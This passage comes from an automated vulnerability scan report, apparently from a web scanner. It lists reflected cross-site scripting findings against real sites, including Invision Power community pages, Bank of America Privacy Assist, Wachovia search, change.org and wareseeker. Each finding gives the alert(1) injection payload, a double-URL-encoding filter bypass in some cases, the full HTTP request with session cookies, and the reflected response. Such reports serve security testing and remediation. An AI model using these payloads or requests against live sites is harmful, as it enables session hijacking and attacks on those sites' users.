<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xml:lang="en" lang="en" xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.f ...[SNIP]... <script type="text/javascript"> ipb.sharelinks.url = "http://community.invisionpower.com/files/file/3941-vanilla-valentine/?18a46"-alert(1)-"12d2b2f2f27=1"; ipb.sharelinks.title = "Vanilla Valentine"; ipb.sharelinks.bname = "Invision Power Services"; </script> ...[SNIP]...
3.45. http://community.invisionpower.com/files/file/3942-sos31-file-version-in-online-list/ [name of an arbitrarily supplied request parameter]
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload bf855"-alert(1)-"7755996cd4f was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /files/file/3942-sos31-file-version-in-online-list/?bf855"-alert(1)-"7755996cd4f=1 HTTP/1.1 Host: community.invisionpower.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: cforums_session_id=757045b851650fbe10c53dad4062548d; __utmz=161164207.1296685568.1.1.utmcsr=invisionpower.com|utmccn=(referral)|utmcmd=referral|utmcct=/products/board/; __utma=161164207.2019448737.1296685568.1296685568.1296685568.1; __utmc=161164207; __utmb=161164207.1.10.1296685568;
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xml:lang="en" lang="en" xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.f ...[SNIP]... <script type="text/javascript"> ipb.sharelinks.url = "http://community.invisionpower.com/files/file/3942-sos31-file-version-in-online-list/?bf855"-alert(1)-"7755996cd4f=1"; ipb.sharelinks.title = "(SOS31) File Version in Online List"; ipb.sharelinks.bname = "Invision Power Services"; </script> ...[SNIP]...
3.46. http://community.invisionpower.com/files/file/3943-speed/ [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://community.invisionpower.com
Path: /files/file/3943-speed/
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 7b7e3"-alert(1)-"7fa62b66d30 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /files/file/3943-speed/?7b7e3"-alert(1)-"7fa62b66d30=1 HTTP/1.1 Host: community.invisionpower.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: cforums_session_id=757045b851650fbe10c53dad4062548d; __utmz=161164207.1296685568.1.1.utmcsr=invisionpower.com|utmccn=(referral)|utmcmd=referral|utmcct=/products/board/; __utma=161164207.2019448737.1296685568.1296685568.1296685568.1; __utmc=161164207; __utmb=161164207.1.10.1296685568;
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xml:lang="en" lang="en" xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.f ...[SNIP]... <script type="text/javascript"> ipb.sharelinks.url = "http://community.invisionpower.com/files/file/3943-speed/?7b7e3"-alert(1)-"7fa62b66d30=1"; ipb.sharelinks.title = "Speed"; ipb.sharelinks.bname = "Invision Power Services"; </script> ...[SNIP]...
3.47. http://community.invisionpower.com/files/file/3944-ipchat-12-turkish-language-pack/ [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://community.invisionpower.com
Path: /files/file/3944-ipchat-12-turkish-language-pack/
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 7f9a9"-alert(1)-"dc3219cb2fe was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /files/file/3944-ipchat-12-turkish-language-pack/?7f9a9"-alert(1)-"dc3219cb2fe=1 HTTP/1.1 Host: community.invisionpower.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: cforums_session_id=757045b851650fbe10c53dad4062548d; __utmz=161164207.1296685568.1.1.utmcsr=invisionpower.com|utmccn=(referral)|utmcmd=referral|utmcct=/products/board/; __utma=161164207.2019448737.1296685568.1296685568.1296685568.1; __utmc=161164207; __utmb=161164207.1.10.1296685568;
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xml:lang="en" lang="en" xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.f ...[SNIP]... <script type="text/javascript"> ipb.sharelinks.url = "http://community.invisionpower.com/files/file/3944-ipchat-12-turkish-language-pack/?7f9a9"-alert(1)-"dc3219cb2fe=1"; ipb.sharelinks.title = "IP.Chat 1.2 Turkish Language Pack"; ipb.sharelinks.bname = "Invision Power Services"; </script> ...[SNIP]...
3.48. http://community.invisionpower.com/resources/documentation/index.html [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Firm
Host: http://community.invisionpower.com
Path: /resources/documentation/index.html
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 455b5'><a>78f4a32a5a9 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /resources/documentation/index.html?455b5'><a>78f4a32a5a9=1 HTTP/1.1 Host: community.invisionpower.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: cforums_session_id=757045b851650fbe10c53dad4062548d; __utmz=161164207.1296685568.1.1.utmcsr=invisionpower.com|utmccn=(referral)|utmcmd=referral|utmcct=/products/board/; __utma=161164207.2019448737.1296685568.1296685568.1296685568.1; __utmc=161164207; __utmb=161164207.1.10.1296685568;
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xml:lang="en" lang="en" xmlns="http://www.w3.org/1999/xhtml"> <hea ...[SNIP]... <input type='hidden' name='return' value='http://community.invisionpower.com/resources/documentation/index.html?455b5'><a>78f4a32a5a9=1' /> ...[SNIP]...
3.49. http://community.invisionpower.com/resources/documentation/index.html/_/documentation/getting-started/installation-r17 [name of an arbitrarily supplied request parameter]
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload dff31'><script>alert(1)</script>1470dab73a4 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /resources/documentation/index.html/_/documentation/getting-started/installation-r17?dff31'><script>alert(1)</script>1470dab73a4=1 HTTP/1.1 Host: community.invisionpower.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: cforums_session_id=8d464692f5305d92adc7b346c33d132b; cforums_itemMarking_forums_items=eJxLtDK0qs60MjY2sDQ3tM60MjSyNDOzMDU1NrGuBVwwaHIHAw%2C%2C; cforums_modpids=deleted; __utmz=161164207.1296685568.1.1.utmcsr=invisionpower.com|utmccn=(referral)|utmcmd=referral|utmcct=/products/board/; __utma=161164207.2019448737.1296685568.1296685568.1296685568.1; __utmc=161164207; __utmb=161164207.1.10.1296685568;
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xml:lang="en" lang="en" xmlns="http://www.w3.org/1999/xhtml"> <hea ...[SNIP]... <input type='hidden' name='return' value='http://community.invisionpower.com/resources/documentation/index.html/_/documentation/getting-started/installation-r17?dff31'><script>alert(1)</script>1470dab73a4=1' /> ...[SNIP]...
3.50. http://community.invisionpower.com/resources/documentation/index.html/_/documentation/getting-started/ipnexus-getting-started-guide-r514 [name of an arbitrarily supplied request parameter]
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 9564a'><script>alert(1)</script>f6702a3a7ba was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /resources/documentation/index.html/_/documentation/getting-started/ipnexus-getting-started-guide-r514?9564a'><script>alert(1)</script>f6702a3a7ba=1 HTTP/1.1 Host: community.invisionpower.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: cforums_session_id=8d464692f5305d92adc7b346c33d132b; cforums_itemMarking_forums_items=eJxLtDK0qs60MjY2sDQ3tM60MjSyNDOzMDU1NrGuBVwwaHIHAw%2C%2C; cforums_modpids=deleted; __utmz=161164207.1296685568.1.1.utmcsr=invisionpower.com|utmccn=(referral)|utmcmd=referral|utmcct=/products/board/; __utma=161164207.2019448737.1296685568.1296685568.1296685568.1; __utmc=161164207; __utmb=161164207.1.10.1296685568;
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xml:lang="en" lang="en" xmlns="http://www.w3.org/1999/xhtml"> <hea ...[SNIP]... <input type='hidden' name='return' value='http://community.invisionpower.com/resources/documentation/index.html/_/documentation/getting-started/ipnexus-getting-started-guide-r514?9564a'><script>alert(1)</script>f6702a3a7ba=1' /> ...[SNIP]...
3.51. http://community.invisionpower.com/resources/documentation/index.html/_/documentation/getting-started/upgrading-r18 [name of an arbitrarily supplied request parameter]
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload da888'><script>alert(1)</script>8095f60edfb was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /resources/documentation/index.html/_/documentation/getting-started/upgrading-r18?da888'><script>alert(1)</script>8095f60edfb=1 HTTP/1.1 Host: community.invisionpower.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: cforums_session_id=8d464692f5305d92adc7b346c33d132b; cforums_itemMarking_forums_items=eJxLtDK0qs60MjY2sDQ3tM60MjSyNDOzMDU1NrGuBVwwaHIHAw%2C%2C; cforums_modpids=deleted; __utmz=161164207.1296685568.1.1.utmcsr=invisionpower.com|utmccn=(referral)|utmcmd=referral|utmcct=/products/board/; __utma=161164207.2019448737.1296685568.1296685568.1296685568.1; __utmc=161164207; __utmb=161164207.1.10.1296685568;
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xml:lang="en" lang="en" xmlns="http://www.w3.org/1999/xhtml"> <hea ...[SNIP]... <input type='hidden' name='return' value='http://community.invisionpower.com/resources/documentation/index.html/_/documentation/getting-started/upgrading-r18?da888'><script>alert(1)</script>8095f60edfb=1' /> ...[SNIP]...
3.52. http://community.invisionpower.com/resources/documentation/index.html/_/knowledge-base/recurring-non-version-specific-issues/encoded-files-with-zend-guard-r536 [name of an arbitrarily supplied request parameter]
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload f3f88'><script>alert(1)</script>0031e83123d was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /resources/documentation/index.html/_/knowledge-base/recurring-non-version-specific-issues/encoded-files-with-zend-guard-r536?f3f88'><script>alert(1)</script>0031e83123d=1 HTTP/1.1 Host: community.invisionpower.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: cforums_session_id=8d464692f5305d92adc7b346c33d132b; cforums_itemMarking_forums_items=eJxLtDK0qs60MjY2sDQ3tM60MjSyNDOzMDU1NrGuBVwwaHIHAw%2C%2C; cforums_modpids=deleted; __utmz=161164207.1296685568.1.1.utmcsr=invisionpower.com|utmccn=(referral)|utmcmd=referral|utmcct=/products/board/; __utma=161164207.2019448737.1296685568.1296685568.1296685568.1; __utmc=161164207; __utmb=161164207.1.10.1296685568;
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xml:lang="en" lang="en" xmlns="http://www.w3.org/1999/xhtml"> <hea ...[SNIP]... input type='hidden' name='return' value='http://community.invisionpower.com/resources/documentation/index.html/_/knowledge-base/recurring-non-version-specific-issues/encoded-files-with-zend-guard-r536?f3f88'><script>alert(1)</script>0031e83123d=1' /> ...[SNIP]...
3.53. http://community.invisionpower.com/resources/official.html [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Firm
Host: http://community.invisionpower.com
Path: /resources/official.html
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 2e492'><a>093e292e14d was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Request
GET /resources/official.html?2e492'><a>093e292e14d=1 HTTP/1.1 Host: community.invisionpower.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: cforums_session_id=757045b851650fbe10c53dad4062548d; __utmz=161164207.1296685568.1.1.utmcsr=invisionpower.com|utmccn=(referral)|utmcmd=referral|utmcct=/products/board/; __utma=161164207.2019448737.1296685568.1296685568.1296685568.1; __utmc=161164207; __utmb=161164207.1.10.1296685568;
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3cf50%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e89c53a9cf29 was submitted in the REST URL parameter 2. This input was echoed as 3cf50"><script>alert(1)</script>89c53a9cf29 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /japan-news/16713cf50%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e89c53a9cf29/tuna-costs-254-000-in-japan/ HTTP/1.1 Host: insidejapantours.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=ISO-8859-1 Set-Cookie: CSPSESSIONID-SP-80=00000001000039cj9PCk000000iW6rcNrdSziWggn6yemmaw--; path=/; CACHE-CONTROL: no-cache CONNECTION: Close DATE: Thu, 03 Feb 2011 01:03:09 GMT EXPIRES: Thu, 29 Oct 1998 17:04:19 GMT PRAGMA: no-cache
<!DOCTYPE html PUBLIC "-//W3C//DTD Xhtml 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html> <head> <link rel="alternate" type="application/rss+xml" title="Japan ...[SNIP]... <a href="http://del.icio.us/post?url=http://www.insidejapantours.com/japan-news/16713cf50"><script>alert(1)</script>89c53a9cf29/tuna-costs-254-000-in-japan/&title=Chinese%20New%20Year%20boosts%20Japan%20tourism"> ...[SNIP]...
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c2d11%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e3dcc286b11c was submitted in the REST URL parameter 3. This input was echoed as c2d11"><script>alert(1)</script>3dcc286b11c in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /japan-news/1671/tuna-costs-254-000-in-japanc2d11%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e3dcc286b11c/ HTTP/1.1 Host: insidejapantours.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=ISO-8859-1 Set-Cookie: CSPSESSIONID-SP-80=00000001000039cn9Q4p0000004Xg2fUaiviCivWQ_RWXE4w--; path=/; CACHE-CONTROL: no-cache CONNECTION: Close DATE: Thu, 03 Feb 2011 01:03:12 GMT EXPIRES: Thu, 29 Oct 1998 17:04:19 GMT PRAGMA: no-cache
<!DOCTYPE html PUBLIC "-//W3C//DTD Xhtml 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html> <head> <link rel="alternate" type="application/rss+xml" title="Japan ...[SNIP]... <a href="http://del.icio.us/post?url=http://www.insidejapantours.com/japan-news/1671/tuna-costs-254-000-in-japanc2d11"><script>alert(1)</script>3dcc286b11c/&title=Tuna%20costs%20%A3254%2C000%20in%20Japan"> ...[SNIP]...
3.56. http://news.change.org/stories/nobu-ignores-18000-people-asking-for-an-end-to-bluefin-sushi [name of an arbitrarily supplied request parameter]
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 7bf2b</script><script>alert(1)</script>36bc7e08caf was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /stories/nobu-ignores-18000-people-asking-for-an-end-to-bluefin-sushi?7bf2b</script><script>alert(1)</script>36bc7e08caf=1 HTTP/1.1 Host: news.change.org Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
3.57. https://privacyassist.bankofamerica.com/Pages/English/In_Activation.asp [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: https://privacyassist.bankofamerica.com
Path: /Pages/English/In_Activation.asp
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 73a68'-alert(1)-'bbae7f15828 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /Pages/English/In_Activation.asp?73a68'-alert(1)-'bbae7f15828=1 HTTP/1.1 Host: privacyassist.bankofamerica.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Cache-Control: private Content-Length: 33448 Content-Type: text/html X-Powered-By: ASP.NET Set-Cookie: ASPSESSIONIDAGCQRSRC=BCDJILIAFFAGBBIDFABDKBNE; secure; path=/ Date: Wed, 02 Feb 2011 21:59:59 GMT Connection: close
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"> <html lang="en-US"> <head>
<title>Bank of America | Privacy Assist | Sign In</title>
<meta name="description" content="The s ...[SNIP]... <!-- var strHref = 'https://' + 'privacyassist.bankofamerica.com' + '/pages/english/in_activation.asp' + '?73a68'-alert(1)-'bbae7f15828=1'; strHref = strHref.toLowerCase() if (strHref.indexOf('lm_fraudprotect') < 0 && strHref.indexOf('lm_cardregistry') < 0 && strHref.indexOf('lm_creditreport') < 0 ) { v ...[SNIP]...
3.58. https://privacyassist.bankofamerica.com/Pages/English/In_Activation.asp [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Firm
Host: https://privacyassist.bankofamerica.com
Path: /Pages/English/In_Activation.asp
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e6508"><a>a5002a02ed4 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /Pages/English/In_Activation.asp?e6508"><a>a5002a02ed4=1 HTTP/1.1 Host: privacyassist.bankofamerica.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Cache-Control: private Content-Length: 33648 Content-Type: text/html X-Powered-By: ASP.NET Set-Cookie: ASPSESSIONIDAGCQRSRC=NADJILIAAEJKGBMFKCCKAKFC; secure; path=/ Date: Wed, 02 Feb 2011 21:59:54 GMT Connection: close
<script type="text/javascript"> alert ("Special Characters are not allowed."); location.href = "http://www.bankofamerica.com"; </script>
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Tr ...[SNIP]... <a class="menu" title="Home" name="Home_Header_Login.asp" href="https://privacyassist.bankofamerica.com/home.asp?e6508"><a>a5002a02ed4=1"> ...[SNIP]...
3.59. https://privacyassist.bankofamerica.com/Pages/English/In_Activation.asp [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: https://privacyassist.bankofamerica.com
Path: /Pages/English/In_Activation.asp
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload e508d"-alert(1)-"e0d6dc517b3 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /Pages/English/In_Activation.asp?e508d"-alert(1)-"e0d6dc517b3=1 HTTP/1.1 Host: privacyassist.bankofamerica.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Cache-Control: private Content-Length: 33448 Content-Type: text/html X-Powered-By: ASP.NET Set-Cookie: ASPSESSIONIDAGCQRSRC=NBDJILIAKMMGBBIBOJIMHFBD; secure; path=/ Date: Wed, 02 Feb 2011 21:59:58 GMT Connection: close
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"> <html lang="en-US"> <head>
<title>Bank of America | Privacy Assist | Sign In</title>
<meta name="description" content="The s ...[SNIP]... <!-- function GoPage(page) { var sSQuery = "e508d"-alert(1)-"e0d6dc517b3=1";
3.60. http://search.wachovia.com/selfservice/microsites/wachoviaSearchEntry.do [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://search.wachovia.com
Path: /selfservice/microsites/wachoviaSearchEntry.do
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9c128"><script>alert(1)</script>0f891e45ab3 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /selfservice/microsites/wachoviaSearchEntry.do?9c128"><script>alert(1)</script>0f891e45ab3=1 HTTP/1.1 Host: search.wachovia.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: Apache-Coyote/1.1 Set-Cookie: JSESSIONID=C50552A4ACD37FDD2EC8A63C0E354E97; Path=/selfservice Content-Type: text/html;charset=UTF-8 Date: Wed, 02 Feb 2011 22:02:36 GMT Connection: close
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c8b75"><script>alert(1)</script>47d05c4592a was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /ip-boardc8b75"><script>alert(1)</script>47d05c4592a/ HTTP/1.1 Host: search.wareseeker.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Thu, 03 Feb 2011 01:24:37 GMT Server: Apache Set-Cookie: PHPSESSID=4rtpcdn9ep0nfp5tqbhmaq6ve1; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 55139
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><meta http-equiv="Content-Type ...[SNIP]... <a title="ip boardc8b75 script alert 1 script 47d05c4592a Free Download - windows software" href="http://download.wareseeker.com/ip-boardc8b75"><script>alert(1)</script>47d05c4592a/" class="selected allsoftware"> ...[SNIP]...
3.62. http://search.wareseeker.com/ip-board/ [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://search.wareseeker.com
Path: /ip-board/
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ad93e"><script>alert(1)</script>125f5dcb899 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /ip-board/?ad93e"><script>alert(1)</script>125f5dcb899=1 HTTP/1.1 Host: search.wareseeker.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Thu, 03 Feb 2011 01:24:34 GMT Server: Apache Set-Cookie: PHPSESSID=v5k6266f8pht791v1r546ej5o3; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 56242
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><meta http-equiv="Content-Type ...[SNIP]... <a rel="nofollow" href="http://search.wareseeker.com/ip-board/?ad93e"><script>alert(1)</script>125f5dcb899=1p-2/"> ...[SNIP]...
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload a25e7<a>ea4068e9f94 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /tags/WareSeekercoma25e7<a>ea4068e9f94/ROS/tags.js HTTP/1.1 Host: tags.expo9.exponential.com Proxy-Connection: keep-alive Referer: http://search.wareseeker.com/ip-boardc8b75%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E47d05c4592a/ Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
if (expo9_pageId == undefined) { var expo9_pageId = (new Date()).getTime() % 20000001 + parseInt(Math.random() * 10000); var expo9_adNum = 0; } var e9; var e9TKey; expo9_ad = (function() {
var version = "1.20"; var displayAdVersion = "0.3";
